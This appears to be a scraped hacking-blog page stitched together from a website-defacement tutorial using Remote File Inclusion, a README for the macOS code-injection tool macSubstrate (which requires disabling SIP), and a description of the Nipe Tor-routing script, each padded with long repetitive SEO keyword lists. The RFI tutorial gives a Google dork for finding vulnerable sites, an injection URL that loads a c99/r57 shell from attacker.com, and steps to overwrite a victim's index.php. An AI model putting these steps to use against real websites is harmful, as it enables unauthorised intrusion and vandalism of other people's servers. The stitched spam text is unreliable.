HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.

RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.

As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.

inurl: "index.php?page=home"

At the place of home, you can also try some other pages like products, gallery and etc.

If you already a know RFI vulnerable website, then you don't need to find it through Google.

Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.

http://target.com/index.php?page=home

As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.

http://target.com/index.php?page=http://attacker.com/maliciousScript.txt

I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.

Now, if it's a really vulnerable website, then there would be 3 things that can happen.

1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
3. Successful execution.

As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.

Related word

• Hacking Tools Windows 10
• Pentest Tools Online
• Pentest Tools For Android
• Hackers Toolbox
• Nsa Hack Tools
• Pentest Automation Tools
• Hack Tools For Windows
• Physical Pentest Tools
• Hackers Toolbox
• Pentest Tools Github
• Pentest Tools Website Vulnerability
• Pentest Tools Website Vulnerability
• Pentest Reporting Tools
• Pentest Tools Linux
• Pentest Tools Review
• World No 1 Hacker Software
• What Is Hacking Tools
• Hacking Tools Free Download
• Top Pentest Tools
• Hacking Tools Windows 10
• Hackrf Tools
• Nsa Hack Tools
• Hacker Tools For Mac
• Hacking Tools For Windows Free Download
• Usb Pentest Tools
• Hacking Tools Download
• Hak5 Tools
• Hacker Tools Windows
• Hack Apps
• Easy Hack Tools
• Hack Tools For Ubuntu
• New Hack Tools
• Free Pentest Tools For Windows
• Pentest Tools Free
• Hacking Tools Free Download
• Hacking Tools For Windows
• Hack Rom Tools
• Hacker Tool Kit
• Hacking Tools For Kali Linux
• Hacker Hardware Tools
• Pentest Tools Kali Linux
• Android Hack Tools Github
• Pentest Tools For Android
• Hacking Tools For Kali Linux
• Pentest Tools Subdomain
• Computer Hacker
• Hack Tools For Windows
• Hacking Tools 2019
• Hacker Tools Software
• Bluetooth Hacking Tools Kali
• Pentest Tools Tcp Port Scanner
• Pentest Tools Framework
• Pentest Tools Alternative
• Nsa Hack Tools Download
• Growth Hacker Tools
• Hack Tools Github
• Hacking Tools Download
• Hack Website Online Tool
• Hacks And Tools
• How To Hack
• Pentest Box Tools Download
• Hack Tools Pc
• Pentest Tools Kali Linux
• Hacker Tools For Ios
• Best Hacking Tools 2020
• Pentest Tools Bluekeep
• Hacking Tools Software
• Hacking Tools For Windows
• Hacker Tools Online
• Hacking Tools Free Download
• Pentest Tools Subdomain
• Pentest Tools List
• Pentest Tools Review
• Physical Pentest Tools
• Hack Tools For Ubuntu
• Pentest Tools Website Vulnerability
• Hacking Tools Online
• Hack Website Online Tool
• Hack Tools For Mac
• Best Pentesting Tools 2018
• Hacker Tools Github
• Hacking Tools Mac
• Hacking Tools Windows
• Tools 4 Hack
• Tools For Hacker
• Pentest Reporting Tools
• Hack Website Online Tool
• Hacking Tools 2020
• Hacker Search Tools
• Hacker
• Nsa Hacker Tools
• Hacking App
• Hacker Tools Online
• Hacker Tools Linux
• How To Make Hacking Tools
• Hacker Tools
• Hack And Tools
• Github Hacking Tools
• Hacking Tools 2019
• Pentest Tools For Mac
• Android Hack Tools Github
• How To Install Pentest Tools In Ubuntu
• Hack Tools
• How To Hack
• Hack Tools 2019
• Usb Pentest Tools
• Hacker Tools Mac
• Pentest Tools Framework
• Hack Tools For Ubuntu
• Hack Tools For Mac
• Black Hat Hacker Tools
• Pentest Tools Framework
• Hack Tools Github
• Underground Hacker Sites
• Tools Used For Hacking
• How To Install Pentest Tools In Ubuntu

macSubstrate - Tool For Interprocess Code Injection On macOS

macSubstrate is a platform tool for interprocess code injection on macOS, with the similar function to Cydia Substrate on iOS. Using macSubstrate, you can inject your plugins (.bundle or .framework) into a mac app (including sandboxed apps) to tweak it in the runtime.

• All you need is to get or create plugins for your target app.
  
• No trouble with modification and codesign for the original target app.
  
• No more work after the target app is updated.
  
• Super easy to install or uninstall a plugin.
  
• Loading plugins automatically whenever the target app is relaunched.
  
• Providing a GUI app to make injection much easier.

Prepare

• Disable SIP
  
• Why should disable SIP
  

  System Integrity Protection is a new security policy that applies to every running process, including privileged code and code that runs out of the sandbox. The policy extends additional protections to components on disk and at run-time, only allowing system binaries to be modified by the system installer and software updates. Code injection and runtime attachments to system binaries are no longer permitted.

Usage

1. download macSubstrate.app, put into /Applications and launch it.
   
   
   
2. grant authorization if needed.
   
3. install a plugin by importing or dragging into macSubstrate.
   
   
4. launch the target app.
   step 3 and step 4 can be switched
   Once a plugin is installed by macSubstrate, it will take effect immediately. But if you want it to work whenever the target app is relaunched or macOS is restarted, you need to keep macSubstrate running and allow it to automatically launch at login.
   
5. uninstall a plugin when you do not need it anymore.
   
   

Plugin
macSubstrate supports plugins of .bundle or .framework, so you just need to create a valid .bundle or .framework file. The most important thing is to add a key macSubstratePlugin into the info.plist, with the dictionary value:

Key	Value
TargetAppBundleID	the target app's CFBundleIdentifier, this tells macSubstrate which app to inject.
Description	brief description of the plugin
AuthorName	author name of the plugin
AuthorEmail	author email of the plugin

Please check the demo plugins demo.bundle and demo.framework for details.

Xcode Templates
macSubstrate also provides Xcode Templates to help you create plugins conveniently:

1. ln -fhs ./macSubstratePluginTemplate ~/Library/Developer/Xcode/Templates/macSubstrate\ Plugin
   
2. Launch Xcode, and there will be 2 new plugin templates for you.
   

Security

1. SIP is a new security policy on macOS, which will help to keep you away from potential security risk. Disable it means you will lose the protection from SIP.
2. If you install a plugin from a developer, you should be responsible for the security of the plugin. If you do not trust it, please do not install it. macSubstrate will help to verify the code signature of a plugin, and I suggest you to scan it using VirusTotal. Anyway, macSubstrate is just a tool, and it is your choice to decide what plugin to install.

Download macSubstrate

Related links

1. Hacking Tools 2019
2. Hack Apps
3. Hack Tools
4. Hacking Tools Github
5. Hack Tools Pc
6. Black Hat Hacker Tools
7. Hack Tools Online
8. Hacker Tools List
9. Hacking Tools Software
10. Pentest Tools Website Vulnerability
11. Pentest Tools Apk
12. Hack Tool Apk No Root
13. Hackrf Tools
14. Ethical Hacker Tools
15. Hacker Tools Windows
16. Hacking Tools Github
17. Hacker Security Tools
18. Hacking Tools For Kali Linux
19. Pentest Tools Free
20. Hacker Tools 2019
21. Hacker Tools Hardware
22. Termux Hacking Tools 2019
23. Black Hat Hacker Tools
24. Hacking Tools Mac
25. Pentest Tools Android
26. Tools For Hacker
27. Hacker Tools Mac
28. Hack Apps
29. Pentest Tools Url Fuzzer
30. Pentest Tools Website
31. Pentest Tools Website Vulnerability
32. Hacking Tools Free Download
33. Computer Hacker
34. Hacker Tools 2019
35. Hacker Tools For Windows
36. Hack Tools For Ubuntu
37. Hacking Apps
38. Ethical Hacker Tools
39. Install Pentest Tools Ubuntu
40. Pentest Tools Apk
41. Hack Website Online Tool
42. Pentest Tools Kali Linux
43. Pentest Reporting Tools
44. Best Pentesting Tools 2018
45. Hak5 Tools
46. Hacking Tools Pc
47. Pentest Tools Linux
48. Pentest Tools Framework
49. Hacking Tools For Windows
50. Hack Tools For Windows
51. Hacker Tool Kit
52. Hacking Tools Online
53. Pentest Tools Apk

Nipe - A Script To Make TOR Network Your Default Gateway

Tor enables users to surf the Internet, chat and send instant messages anonymously, and is used by a wide variety of people for both Licit and Illicit purposes. Tor has, for example, been used by criminals enterprises, Hacktivism groups, and law enforcement agencies at cross purposes, sometimes simultaneously.

Nipe is a Script to make Tor Network your Default Gateway.

This Perl Script enables you to directly route all your traffic from your computer to the Tor Network through which you can surf the Internet Anonymously without having to worry about being tracked or traced back.

Download and install:

    git clone https://github.com/GouveaHeitor/nipe
    cd nipe
    cpan install Switch JSON LWP::UserAgent

Commands:

    COMMAND          FUNCTION
    install          Install dependencies
    start            Start routing
    stop             Stop routing
    restart          Restart the Nipe process
    status           See status

    Examples:

    perl nipe.pl install
    perl nipe.pl start
    perl nipe.pl stop
    perl nipe.pl restart
    perl nipe.pl status

Bugs

• Report bugs in my email: [hi@heitorgouvea.me]

Download Nipe

Continue reading

1. Hack Tools Download
2. Pentest Tools Github
3. Hack App
4. Hack Rom Tools
5. Blackhat Hacker Tools
6. Hacking Tools Pc
7. Hack And Tools
8. Hackrf Tools
9. Hack Rom Tools
10. Hacking Apps
11. Hacking Tools Name
12. Bluetooth Hacking Tools Kali
13. Pentest Tools Port Scanner
14. Pentest Tools Port Scanner
15. Hack Tools For Mac
16. Hacker Security Tools
17. Hacking Tools Free Download
18. Pentest Tools Android
19. Hack Tools Online
20. Hack Tools Pc
21. Hack Website Online Tool
22. How To Install Pentest Tools In Ubuntu
23. What Is Hacking Tools
24. Hacking Tools Software
25. Hacker Tools Github
26. Hack Tools Mac
27. Hacking Tools Online
28. Pentest Tools Online
29. Hacker Tools For Windows
30. Computer Hacker
31. Hack App
32. Hacker Tools Apk Download
33. Hacking Tools Mac
34. Hacking Tools Kit
35. Tools Used For Hacking
36. Hacker Tools
37. Pentest Box Tools Download
38. Hacking Tools Free Download
39. Hack Tools For Games
40. Pentest Tools Open Source
41. Free Pentest Tools For Windows
42. Pentest Tools Url Fuzzer
43. Hack Tools Online
44. Hacking Tools 2020
45. Hacker Security Tools
46. Pentest Tools Nmap
47. Pentest Box Tools Download
48. Kik Hack Tools
49. Hacker Tools Software
50. Underground Hacker Sites
51. Hack Tool Apk
52. Best Hacking Tools 2020
53. Hack Tools 2019
54. Hack Tools Download
55. Hacker Tools 2019
56. Top Pentest Tools
57. Pentest Tools List
58. Hacking Tools Pc
59. Hack Tools
60. Hacking Tools
61. Hack Tools
62. Hackrf Tools
63. How To Hack
64. Hack Apps
65. Blackhat Hacker Tools
66. Hacker Tools Free Download
67. Hack Tools
68. Hacker Tool Kit
69. Best Hacking Tools 2019
70. Hacker Techniques Tools And Incident Handling
71. Physical Pentest Tools
72. Hacker Techniques Tools And Incident Handling
73. Hacker Search Tools
74. Hacking Apps
75. Hack Tools Github
76. Tools Used For Hacking
77. Hacker Tools Online
78. Hack Tool Apk No Root
79. Android Hack Tools Github
80. How To Make Hacking Tools
81. Hacker Tools 2020
82. Bluetooth Hacking Tools Kali
83. Nsa Hack Tools
84. Hack Tools Download
85. Hack Tools Github
86. Free Pentest Tools For Windows
87. Best Hacking Tools 2019
88. Hack Tools Online
89. Hack Apps
90. Hacker
91. Hacking Tools For Mac
92. Beginner Hacker Tools
93. Hacking Tools Github
94. Tools Used For Hacking
95. Nsa Hack Tools Download
96. Pentest Tools Nmap
97. Blackhat Hacker Tools
98. Hacking Tools Windows 10
99. Hack Apps
100. Pentest Tools Free
101. Pentest Tools Framework
102. Hacking Tools For Mac
103. Top Pentest Tools
104. Hacker Tool Kit
105. Pentest Tools For Ubuntu
106. Best Hacking Tools 2020
107. Hacking Tools Download
108. Hacker Tools Free
109. Hacker Security Tools
110. Hacking Apps
111. Hacking Tools For Windows
112. New Hacker Tools
113. Pentest Tools Apk
114. Hacking Tools For Mac
115. Top Pentest Tools
116. Best Hacking Tools 2019
117. Hack Tools Pc
118. Android Hack Tools Github
119. Pentest Tools Android
120. Pentest Tools Windows
121. Beginner Hacker Tools
122. Pentest Tools Framework
123. Android Hack Tools Github
124. Nsa Hack Tools Download
125. Top Pentest Tools
126. Hack Tools For Mac
127. Hacking Tools Hardware
128. Pentest Tools Apk
129. Hack Tools Github
130. Physical Pentest Tools
131. Hacker Tools Free Download
132. Hack Tools Pc
133. Top Pentest Tools
134. Pentest Tools Bluekeep
135. Pentest Tools Open Source
136. Bluetooth Hacking Tools Kali
137. Hacker Tool Kit
138. Wifi Hacker Tools For Windows
139. Tools Used For Hacking
140. Github Hacking Tools
141. New Hacker Tools
142. Top Pentest Tools
143. Pentest Tools Apk
144. Physical Pentest Tools
145. Hacking Tools Windows
146. Hacker Tools For Mac
147. Hack Tools For Windows
148. Best Pentesting Tools 2018
149. Pentest Box Tools Download
150. Pentest Tools Kali Linux
151. Pentest Tools Find Subdomains
152. Hacking Tools
153. Beginner Hacker Tools
154. Hack Tools For Pc
155. Tools 4 Hack
156. Hack Tools Download
157. Pentest Tools Framework